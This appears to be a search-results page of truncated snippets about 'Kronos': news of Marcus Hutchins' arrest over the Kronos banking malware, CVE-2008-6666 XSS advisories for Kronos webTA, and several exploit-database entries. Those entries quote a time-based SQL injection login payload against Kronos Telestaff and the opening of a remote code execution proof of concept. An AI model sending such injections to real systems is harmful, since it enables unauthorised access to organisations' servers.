312 matches found
WannaCry Hero Arrested, One of Two Charged with Distribution of Kronos Malware
Marcus Hutchins, the researcher hailed for his work in blunting the WannaCry ransomware outbreak in May, was arrested Wednesday in Las Vegas and charged with creating and distributing the Kronos banking malware. Hutchins, known online as Malwaretech, is a U.K. citizen and arrived in Las Vegas las...
FBI Arrests Researcher Who Found 'Kill-Switch' to Stop Wannacry Ransomware
The 22-year-old British security researcher who gained fame for discovering the "kill switch" that stopped the outbreak of the WannaCry ransomware—has been reportedly arrested in the United States after attending the Def Con hacking conference in Las Vegas. Marcus Hutchins, operates under the ali...
Kronos Telestaff < 2.92EU29 - SQL Injection Vulnerability
Exploit for asp platform in category web applications Software: Kronos Telestaff Web Application Version: compare timing with device=stdbrowser&action=doLogin&user='ifDBNAME'TELESTAFF'waitfor%20delay'00%3a00%3a12';--&pwd=&code= PoC 2 - Execute Code Remotely example inject benign code e.g...
Kronos Telestaff SQL Injection
Software: Kronos Telestaff Web Application Version: compare timing with device=stdbrowser&action=doLogin&user='ifDBNAME'TELESTAFF'waitfor%20delay'00%3a00%3a12';--&pwd=&code= PoC 2 - Execute Code Remotely example inject benign code e.g. ping a remote systems ?ph...
Kronos Telestaff 2.92EU29 - SQL Injection
Kronos Telestaff 2.92EU29 - SQL Injection Software: Kronos Telestaff Web Application Version: compare timing with device=stdbrowser&action=doLogin&user='ifDBNAME'TELESTAFF'waitfor%20delay'00%3a00%3a12';--&pwd=&code= PoC 2 - Execute Code Remotely example inject benign code e.g. ping a remote syste...
Kronos Telestaff < 2.92EU29 - SQL Injection
Software: Kronos Telestaff Web Application Version: compare timing with device=stdbrowser&action=doLogin&user='ifDBNAME'TELESTAFF'waitfor%20delay'00%3a00%3a12';--&pwd=&code= PoC 2 - Execute Code Remotely example inject benign code e.g. ping a remote systems ?php $cmdtoexecute = strToHex"pi...
New Kronos Banking Malware Advertised On Russian Forums
Criminals are advertising a new banking Trojan on Russian forums, one going for a hefty price and being marketed as a method of evading detection and analysis. To date, however, security researchers have yet to obtain a sample of Kronos, which is available on a few forums for pre-order at a cost ...
Cross site scripting
Multiple cross-site scripting XSS vulnerabilities in Kronos webTA allow remote attackers to inject arbitrary web script or HTML via the description field to 1 servlet/com.threeis.webta.H710selProject and 2 servlet/com.threeis.webta.H720editProjectInfo. NOTE: BID:29610 states that the initial repo...
CVE-2008-6666
Multiple cross-site scripting XSS vulnerabilities in Kronos webTA allow remote attackers to inject arbitrary web script or HTML via the description field to 1 servlet/com.threeis.webta.H710selProject and 2 servlet/com.threeis.webta.H720editProjectInfo. NOTE: BID:29610 states that the initial repo...
CVE-2008-6666
Multiple cross-site scripting XSS vulnerabilities in Kronos webTA allow remote attackers to inject arbitrary web script or HTML via the description field to 1 servlet/com.threeis.webta.H710selProject and 2 servlet/com.threeis.webta.H720editProjectInfo. NOTE: BID:29610 states that the initial repo...
CVE-2008-6666
CVE-2008-6666 affects Kronos webTA. The vulnerability is a cross-site scripting (XSS) flaw in the description field of two servlets (servlet/com.threeis.webta.H710selProject and servlet/com.threeis.webta.H720editProjectInfo). Exploitation details are not provided in the documents; no specific exp...
webTA by kronos - XSS
http://www.kronos.com/Products/webTA.htm webTA is used by thousands of fed. employees. I did a limited security review of a couple deployments. Because of certain contractual limitations I have been able to verify XSS in its Project Management module only, but I suspect it also exists in...